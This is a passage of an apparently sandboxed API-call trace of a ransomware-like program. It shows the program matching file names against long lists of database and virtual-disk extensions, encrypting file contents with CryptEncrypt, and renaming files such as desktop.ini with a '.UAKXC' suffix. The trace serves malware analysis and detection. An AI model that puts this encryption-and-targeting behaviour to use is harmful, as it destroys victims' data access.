(lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".vhd") returned 0x0 [0136.954] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".vmdk") returned 0x0 [0136.954] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".pvm") returned 0x0 [0136.954] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".vmem") returned 0x0 [0136.955] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".vmsn") returned 0x0 [0136.955] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".vmsd") returned 0x0 [0136.955] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".nvram") returned 0x0 [0136.955] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".vmx") returned 0x0 [0136.955] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".raw") returned 0x0 [0136.955] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".qcow2") returned 0x0 [0136.955] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".subvol") returned 0x0 [0136.955] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".bin") returned 0x0 [0136.955] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".vsv") returned 0x0 [0136.955] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".avhd") returned 0x0 [0136.955] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".vmrs") returned 0x0 [0136.955] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".vhdx") returned 0x0 [0136.955] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".avdx") returned 0x0 [0136.955] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".vmcx") returned 0x0 [0136.955] StrStrIW (lpFirst="C:\\Program Files\\desktop.ini", lpSrch=".iso") returned 0x0 [0136.955] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.955] WriteFile (in: hFile=0x2ac, lpBuffer=0x3abfd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x3abfc78, lpOverlapped=0x0 | out: lpBuffer=0x3abfd70*, lpNumberOfBytesWritten=0x3abfc78*=0x20c, lpOverlapped=0x0) returned 1 [0136.957] WriteFile (in: hFile=0x2ac, lpBuffer=0x3abfc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x3abfc7c, lpOverlapped=0x0 | out: lpBuffer=0x3abfc80*, lpNumberOfBytesWritten=0x3abfc7c*=0xa, lpOverlapped=0x0) returned 1 [0136.957] SetEndOfFile (hFile=0x2ac) returned 1 [0136.957] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.957] ReadFile (in: hFile=0x2ac, lpBuffer=0x5030000, nNumberOfBytesToRead=0xae, lpNumberOfBytesRead=0x3abfc88, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesRead=0x3abfc88*=0xae, lpOverlapped=0x0) returned 1 [0136.957] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xffffff52, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.957] WriteFile (in: hFile=0x2ac, lpBuffer=0x5030000*, nNumberOfBytesToWrite=0xae, lpNumberOfBytesWritten=0x3abfc44, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesWritten=0x3abfc44*=0xae, lpOverlapped=0x0) returned 1 [0136.957] CloseHandle (hObject=0x2ac) returned 1 [0136.958] GetProcessHeap () returned 0xea0000 [0136.958] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0xee6e88 [0136.958] lstrcpyW (in: lpString1=0xee6e88, lpString2="C:\\Program Files\\desktop.ini" | out: lpString1="C:\\Program Files\\desktop.ini") returned="C:\\Program Files\\desktop.ini" [0136.959] lstrcatW (in: lpString1="C:\\Program Files\\desktop.ini", lpString2=".UAKXC" | out: lpString1="C:\\Program Files\\desktop.ini.UAKXC") returned="C:\\Program Files\\desktop.ini.UAKXC" [0136.959] MoveFileW (lpExistingFileName="C:\\Program Files\\desktop.ini" (normalized: "c:\\program files\\desktop.ini"), lpNewFileName="C:\\Program Files\\desktop.ini.UAKXC" (normalized: "c:\\program files\\desktop.ini.uakxc")) returned 1 [0136.959] GetProcessHeap () returned 0xea0000 [0136.959] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6e88 | out: hHeap=0xea0000) returned 1 [0136.959] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebc8e8 | out: hHeap=0xea0000) returned 1 [0136.959] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee2ec8 | out: hHeap=0xea0000) returned 1 [0136.960] CryptGenRandom (in: hProv=0xed0cd0, dwLen=0x20, pbBuffer=0x3abfd50 | out: pbBuffer=0x3abfd50) returned 1 [0136.960] CryptGenRandom (in: hProv=0xed0cd0, dwLen=0x8, pbBuffer=0x3abfd48 | out: pbBuffer=0x3abfd48) returned 1 [0136.960] CryptEncrypt (in: hKey=0xecf860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3abfd70*, pdwDataLen=0x3abfc8c*=0x28, dwBufLen=0x20c | out: pbData=0x3abfd70*, pdwDataLen=0x3abfc8c*=0x200) returned 1 [0136.960] GetFileAttributesW (lpFileName="C:\\Program Files\\Windows Defender" (normalized: "c:\\program files\\windows defender")) returned 0x10 [0136.961] CreateFileW (lpFileName="C:\\Program Files\\Windows Defender" (normalized: "c:\\program files\\windows defender"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0136.961] GetLastError () returned 0x5 [0136.961] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec3340 | out: hHeap=0xea0000) returned 1 [0136.961] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6858 | out: hHeap=0xea0000) returned 1 [0136.961] CryptGenRandom (in: hProv=0xed0cd0, dwLen=0x20, pbBuffer=0x3abfd50 | out: pbBuffer=0x3abfd50) returned 1 [0136.961] CryptGenRandom (in: hProv=0xed0cd0, dwLen=0x8, pbBuffer=0x3abfd48 | out: pbBuffer=0x3abfd48) returned 1 [0136.961] CryptEncrypt (in: hKey=0xecf860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3abfd70*, pdwDataLen=0x3abfc8c*=0x28, dwBufLen=0x20c | out: pbData=0x3abfd70*, pdwDataLen=0x3abfc8c*=0x200) returned 1 [0136.962] GetFileAttributesW (lpFileName="C:\\Program Files\\Windows Journal" (normalized: "c:\\program files\\windows journal")) returned 0x10 [0136.962] CreateFileW (lpFileName="C:\\Program Files\\Windows Journal" (normalized: "c:\\program files\\windows journal"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0136.962] GetLastError () returned 0x5 [0136.962] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec31e0 | out: hHeap=0xea0000) returned 1 [0136.962] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6880 | out: hHeap=0xea0000) returned 1 [0136.962] CryptGenRandom (in: hProv=0xed0cd0, dwLen=0x20, pbBuffer=0x3abfd50 | out: pbBuffer=0x3abfd50) returned 1 [0136.962] CryptGenRandom (in: hProv=0xed0cd0, dwLen=0x8, pbBuffer=0x3abfd48 | out: pbBuffer=0x3abfd48) returned 1 [0136.962] CryptEncrypt (in: hKey=0xecf860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3abfd70*, pdwDataLen=0x3abfc8c*=0x28, dwBufLen=0x20c | out: pbData=0x3abfd70*, pdwDataLen=0x3abfc8c*=0x200) returned 1 [0136.963] GetFileAttributesW (lpFileName="C:\\Program Files\\Windows Mail" (normalized: "c:\\program files\\windows mail")) returned 0x10 [0136.963] CreateFileW (lpFileName="C:\\Program Files\\Windows Mail" (normalized: "c:\\program files\\windows mail"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0136.963] GetLastError () returned 0x5 [0136.963] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcae0 | out: hHeap=0xea0000) returned 1 [0136.963] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee68a8 | out: hHeap=0xea0000) returned 1 [0136.963] CryptGenRandom (in: hProv=0xed0cd0, dwLen=0x20, pbBuffer=0x3abfd50 | out: pbBuffer=0x3abfd50) returned 1 [0136.963] CryptGenRandom (in: hProv=0xed0cd0, dwLen=0x8, pbBuffer=0x3abfd48 | out: pbBuffer=0x3abfd48) returned 1 [0136.963] CryptEncrypt (in: hKey=0xecf860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3abfd70*, pdwDataLen=0x3abfc8c*=0x28, dwBufLen=0x20c | out: pbData=0x3abfd70*, pdwDataLen=0x3abfc8c*=0x200) returned 1 [0136.964] GetFileAttributesW (lpFileName="C:\\Program Files\\Windows Media Player" (normalized: "c:\\program files\\windows media player")) returned 0x10 [0136.964] CreateFileW (lpFileName="C:\\Program Files\\Windows Media Player" (normalized: "c:\\program files\\windows media player"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0136.964] GetLastError () returned 0x5 [0136.964] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2dc0 | out: hHeap=0xea0000) returned 1 [0136.964] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee68d0 | out: hHeap=0xea0000) returned 1 [0136.964] CryptGenRandom (in: hProv=0xed0cd0, dwLen=0x20, pbBuffer=0x3abfd50 | out: pbBuffer=0x3abfd50) returned 1 [0136.964] CryptGenRandom (in: hProv=0xed0cd0, dwLen=0x8, pbBuffer=0x3abfd48 | out: pbBuffer=0x3abfd48) returned 1 [0136.964] CryptEncrypt (in: hKey=0xecf860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3abfd70*, pdwDataLen=0x3abfc8c*=0x28, dwBufLen=0x20c | out: pbData=0x3abfd70*, pdwDataLen=0x3abfc8c*=0x200) returned 1 [0136.965] GetFileAttributesW (lpFileName="C:\\Program Files\\Windows NT" (normalized: "c:\\program files\\windows nt")) returned 0x10 [0136.965] CreateFileW (lpFileName="C:\\Program Files\\Windows NT" (normalized: "c:\\program files\\windows nt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0136.965] GetLastError () returned 0x5 [0136.965] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcb28 | out: hHeap=0xea0000) returned 1 [0136.965] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee68f8 | out: hHeap=0xea0000) returned 1 [0136.966] CryptGenRandom (in: hProv=0xed0cd0, dwLen=0x20, pbBuffer=0x3abfd50 | out: pbBuffer=0x3abfd50) returned 1 [0136.966] CryptGenRandom (in: hProv=0xed0cd0, dwLen=0x8, pbBuffer=0x3abfd48 | out: pbBuffer=0x3abfd48) returned 1 [0136.966] CryptEncrypt (in: hKey=0xecf860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3abfd70*, pdwDataLen=0x3abfc8c*=0x28, dwBufLen=0x20c | out: pbData=0x3abfd70*, pdwDataLen=0x3abfc8c*=0x200) returned 1 [0136.966] GetFileAttributesW (lpFileName="C:\\Program Files\\Windows Photo Viewer" (normalized: "c:\\program files\\windows photo viewer")) returned 0x10 [0136.966] CreateFileW (lpFileName="C:\\Program Files\\Windows Photo Viewer" (normalized: "c:\\program files\\windows photo viewer"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0136.967] GetLastError () returned 0x5 [0136.967] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2cb8 | out: hHeap=0xea0000) returned 1 [0136.967] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6920 | out: hHeap=0xea0000) returned 1 [0136.967] CryptGenRandom (in: hProv=0xed0cd0, dwLen=0x20, pbBuffer=0x3abfd50 | out: pbBuffer=0x3abfd50) returned 1 [0136.967] CryptGenRandom (in: hProv=0xed0cd0, dwLen=0x8, pbBuffer=0x3abfd48 | out: pbBuffer=0x3abfd48) returned 1 [0136.967] CryptEncrypt (in: hKey=0xecf860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3abfd70*, pdwDataLen=0x3abfc8c*=0x28, dwBufLen=0x20c | out: pbData=0x3abfd70*, pdwDataLen=0x3abfc8c*=0x200) returned 1 [0136.967] GetFileAttributesW (lpFileName="C:\\Program Files\\Windows Portable Devices" (normalized: "c:\\program files\\windows portable devices")) returned 0x10 [0136.968] CreateFileW (lpFileName="C:\\Program Files\\Windows Portable Devices" (normalized: "c:\\program files\\windows portable devices"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0136.968] GetLastError () returned 0x5 [0136.968] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed3498 | out: hHeap=0xea0000) returned 1 [0136.968] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6948 | out: hHeap=0xea0000) returned 1 [0136.968] CryptGenRandom (in: hProv=0xed0cd0, dwLen=0x20, pbBuffer=0x3abfd50 | out: pbBuffer=0x3abfd50) returned 1 [0136.968] CryptGenRandom (in: hProv=0xed0cd0, dwLen=0x8, pbBuffer=0x3abfd48 | out: pbBuffer=0x3abfd48) returned 1 [0136.968] CryptEncrypt (in: hKey=0xecf860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3abfd70*, pdwDataLen=0x3abfc8c*=0x28, dwBufLen=0x20c | out: pbData=0x3abfd70*, pdwDataLen=0x3abfc8c*=0x200) returned 1 [0136.969] GetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar" (normalized: "c:\\program files\\windows sidebar")) returned 0x10 [0136.969] CreateFileW (lpFileName="C:\\Program Files\\Windows Sidebar" (normalized: "c:\\program files\\windows sidebar"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0136.969] GetLastError () returned 0x5 [0136.969] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec3080 | out: hHeap=0xea0000) returned 1 [0136.969] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6970 | out: hHeap=0xea0000) returned 1 [0136.969] CryptGenRandom (in: hProv=0xed0cd0, dwLen=0x20, pbBuffer=0x3abfd50 | out: pbBuffer=0x3abfd50) returned 1 [0136.969] CryptGenRandom (in: hProv=0xed0cd0, dwLen=0x8, pbBuffer=0x3abfd48 | out: pbBuffer=0x3abfd48) returned 1 [0136.969] CryptEncrypt (in: hKey=0xecf860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3abfd70*, pdwDataLen=0x3abfc8c*=0x28, dwBufLen=0x20c | out: pbData=0x3abfd70*, pdwDataLen=0x3abfc8c*=0x200) returned 1 [0136.970] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\desktop.ini" (normalized: "c:\\program files (x86)\\desktop.ini")) returned 0x26 [0136.970] CreateFileW (lpFileName="C:\\Program Files (x86)\\desktop.ini" (normalized: "c:\\program files (x86)\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0136.970] GetLastError () returned 0x0 [0136.970] GetFileSizeEx (in: hFile=0x2ac, lpFileSize=0x3abfc88 | out: lpFileSize=0x3abfc88*=174) returned 1 [0136.970] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".4dd") returned 0x0 [0136.970] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".4dl") returned 0x0 [0136.970] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".accdb") returned 0x0 [0136.971] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".accdc") returned 0x0 [0136.971] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".accde") returned 0x0 [0136.971] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".accdr") returned 0x0 [0136.971] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".accdt") returned 0x0 [0136.971] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".accft") returned 0x0 [0136.971] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".adb") returned 0x0 [0136.971] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".ade") returned 0x0 [0136.971] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".adf") returned 0x0 [0136.971] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".adp") returned 0x0 [0136.971] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".arc") returned 0x0 [0136.971] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".ora") returned 0x0 [0136.971] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".alf") returned 0x0 [0136.971] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".ask") returned 0x0 [0136.971] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".btr") returned 0x0 [0136.971] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".bdf") returned 0x0 [0136.971] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".cat") returned 0x0 [0136.971] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".cdb") returned 0x0 [0136.971] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".ckp") returned 0x0 [0136.971] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".cma") returned 0x0 [0136.971] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".cpd") returned 0x0 [0136.971] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".dacpac") returned 0x0 [0136.971] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".dad") returned 0x0 [0136.971] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".dadiagrams") returned 0x0 [0136.971] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".daschema") returned 0x0 [0136.972] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".db") returned 0x0 [0136.972] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".db-shm") returned 0x0 [0136.972] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".db-wal") returned 0x0 [0136.972] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".db3") returned 0x0 [0136.972] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".dbc") returned 0x0 [0136.972] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".dbf") returned 0x0 [0136.972] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".dbs") returned 0x0 [0136.972] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".dbt") returned 0x0 [0136.972] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".dbv") returned 0x0 [0136.972] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".dbx") returned 0x0 [0136.972] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".dcb") returned 0x0 [0136.972] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".dct") returned 0x0 [0136.972] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".dcx") returned 0x0 [0136.972] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".ddl") returned 0x0 [0136.972] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".dlis") returned 0x0 [0136.972] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".dp1") returned 0x0 [0136.972] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".dqy") returned 0x0 [0136.972] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".dsk") returned 0x0 [0136.972] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".dsn") returned 0x0 [0136.972] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".dtsx") returned 0x0 [0136.972] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".dxl") returned 0x0 [0136.972] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".eco") returned 0x0 [0136.972] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".ecx") returned 0x0 [0136.973] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".edb") returned 0x0 [0136.973] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".epim") returned 0x0 [0136.973] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".exb") returned 0x0 [0136.973] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".fcd") returned 0x0 [0136.973] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".fdb") returned 0x0 [0136.973] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".fic") returned 0x0 [0136.973] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".fmp") returned 0x0 [0136.973] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".fmp12") returned 0x0 [0136.973] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".fmpsl") returned 0x0 [0136.973] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".fol") returned 0x0 [0136.973] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".fp3") returned 0x0 [0136.973] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".fp4") returned 0x0 [0136.973] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".fp5") returned 0x0 [0136.973] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".fp7") returned 0x0 [0136.973] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".fpt") returned 0x0 [0136.973] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".frm") returned 0x0 [0136.973] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".gdb") returned 0x0 [0136.973] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".grdb") returned 0x0 [0136.973] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".gwi") returned 0x0 [0136.973] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".hdb") returned 0x0 [0136.973] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".his") returned 0x0 [0136.973] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".ib") returned 0x0 [0136.973] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".idb") returned 0x0 [0136.973] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".ihx") returned 0x0 [0136.974] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".itdb") returned 0x0 [0136.974] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".itw") returned 0x0 [0136.974] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".jet") returned 0x0 [0136.974] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".jtx") returned 0x0 [0136.974] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".kdb") returned 0x0 [0136.974] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".kexi") returned 0x0 [0136.974] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".kexic") returned 0x0 [0136.974] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".kexis") returned 0x0 [0136.974] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".lgc") returned 0x0 [0136.974] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".lwx") returned 0x0 [0136.974] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".maf") returned 0x0 [0136.974] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".maq") returned 0x0 [0136.974] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".mar") returned 0x0 [0136.974] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".mas") returned 0x0 [0136.974] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".mav") returned 0x0 [0136.974] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".mdb") returned 0x0 [0136.974] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".mdf") returned 0x0 [0136.974] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".mpd") returned 0x0 [0136.974] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".mrg") returned 0x0 [0136.974] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".mud") returned 0x0 [0136.991] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".mwb") returned 0x0 [0136.991] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".myd") returned 0x0 [0136.991] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".ndf") returned 0x0 [0136.991] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".nnt") returned 0x0 [0136.991] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".nrmlib") returned 0x0 [0136.991] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".ns2") returned 0x0 [0136.991] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".ns3") returned 0x0 [0136.991] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".ns4") returned 0x0 [0136.991] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".nsf") returned 0x0 [0136.992] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".nv") returned 0x0 [0136.992] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".nv2") returned 0x0 [0136.992] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".nwdb") returned 0x0 [0136.992] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".nyf") returned 0x0 [0136.992] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".odb") returned 0x0 [0136.992] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".oqy") returned 0x0 [0136.992] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".orx") returned 0x0 [0136.992] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".owc") returned 0x0 [0136.992] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".p96") returned 0x0 [0136.992] StrStrIW 